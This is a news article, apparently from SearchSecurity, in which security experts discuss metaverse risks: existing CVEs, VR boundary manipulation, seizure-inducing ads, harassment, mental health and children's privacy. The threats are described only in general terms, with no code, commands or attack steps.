matrosovv - stock.adobe.com
As virtual worlds and augmented reality platforms develop into what its creators call the "metaverse," users and businesses will be presented with entirely new categories of security risks and pitfalls.
The concept of a 3D virtual environment where users can interact and socialize has existed for some time, but the metaverse was thrust to the center stage last fall when Facebook rebranded as Meta and made a huge bet on bringing the technology to both consumers and enterprises; other technology companies have followed suit. But experts predict that as the metaverse develops, security flaws that have not even been considered by most will become common risks.
Kavya Pearlman, CEO of the XR Security Initiative (XRSI), told SearchSecurity that, early on, many of the risks that developers and companies face will be the same ones that many current sites and web applications deal with.
"You can still exploit existing CVEs," Pearlman noted.
"All of that is going to come along because most of these things are running on the same protocol."
This, Pearlman explained, will mean that flaws like Log4Shell will remain a threat for metaverse platforms. Developers and administrators will need to take the same security precautions and countermeasures.
Stephanie Benoit-Kurtz, a lead faculty member at the University of Phoenix College of Information Systems and Technology, said that adding the additional hardware needed for VR and augmented reality platforms in the metaverse will also increase the exposure of corporate networks and the ability for an attacker to covertly pull data from virtual meetings and presentations.
"From VR headsets to other types of devices that augment the experiences, the infrastructure required to support this new environment is exponentially more extensive than what exists today," Benoit-Kurtz told SearchSecurity.
"The challenge with every endpoint is that bad actors will be looking for ways to exploit those endpoints either to take over identities on the network or block access through denial-of-service attacks."
Things could get physical
As the technology progresses and develops, however, different problems are likely to surface. In particular, attacks could go from the data realm into actual physical dangers.
Pearlman's XRSI has produced proof-of-concept research showing how an attacker could manipulate a VR platform to reset the physical boundaries of hardware. For example, a user could be pushed into the path of furniture or toward a flight of stairs.
This could become even more dangerous as augmented reality enters the picture, and users could potentially be misdirected into a street or led into a dangerous physical situation, such as a robbery or mugging.
Even less pleasant is a hypothetical attack that could, quite literally, leave its victims sick to their stomachs.
"We know that in VR, people could experience motion sickness," Pearlman pointed out. "A creator could by intention embed something that, when you click it, makes you motion sick."
Other attacks could be even more sinister and harmful, said Christopher Boyd, senior threat researcher at Malwarebytes.
"A few years ago, one of the main routes to exploitation in virtual spaces was paid advertising. With plans to insert regular ad networks with dynamic ad spaces into games, it's reasonable to expect compromises and rogue ads," Boyd told SearchSecurity.
"Malicious individuals could have replaced regular ads with strobing images designed to trigger epileptic seizures, along the lines of similar attacks on epilepsy foundations on social media and forums generally."
The most dystopian possibility for the metaverse is the impact it could have on its users' mental health.
Most immediately, the problem of harassment will be something that developers of virtual environments will have to address.
"The primary current route to physical exploitation in VR spaces is sexual harassment and abuse, often helped along by weak or absent safety settings," Boyd explained.
"This has been a problem in virtual spaces for a long time, and plenty of options to combat it exist."
Other potential mental health issues will arise from long-term immersion in virtual worlds.
Pearlman, who was formerly the head of security at Linden Lab, said that while working at VR platform Sansar, she would experience a feeling called "phantom timeline syndrome" where the lines between the virtual world and physical world became blurred.
"You are not be able to distinguish reality from VR," Pearlman recounted. "You step out of VR and you still feel like whatever is around you is VR."
This, she said, will be a particular danger to children who grow with the metaverse. With impressionable young minds spending large amounts of time in VR and AR platforms, Pearlman worries that attackers could use misinformation to manipulate children and imprint false beliefs.
There is also the danger for personal data theft. As metaverse platforms would be able to collect images and other personal details of their users, children would potentially be exposed to even further privacy violations.
"The concept of privacy becomes that much more concerning as you talk about children in this space," Benoit-Kurtz said. "Inevitably kids will be in this space, and the legacy Children's Online Privacy Protection Act (COPPA) is not sufficient to deal with the future of this technology or the adequate safeguards to deal with the exponential personal information that these environments will collect."
How to prepare
Both Pearlman and Benoit-Kurtz agreed that in order to protect their data and their employees' privacy, companies will need more than a just a few policy changes.
Enterprises will need to plan ahead how they will ensure their AR and VR platforms are not being abused either externally by hackers or internally by unethical managers intent on violating the privacy of their colleagues and subordinates.
"Adopting this type of technology by an organization is much bigger than IT and HR. This step into the metaverse will transform organizations significantly over the next five to 10 years," Benoit-Kurtz advised.
"Rather than waiting for the technology to be knocking on the door, organizations should take a proactive approach to the topic by starting to address the conversations at the organizational level now."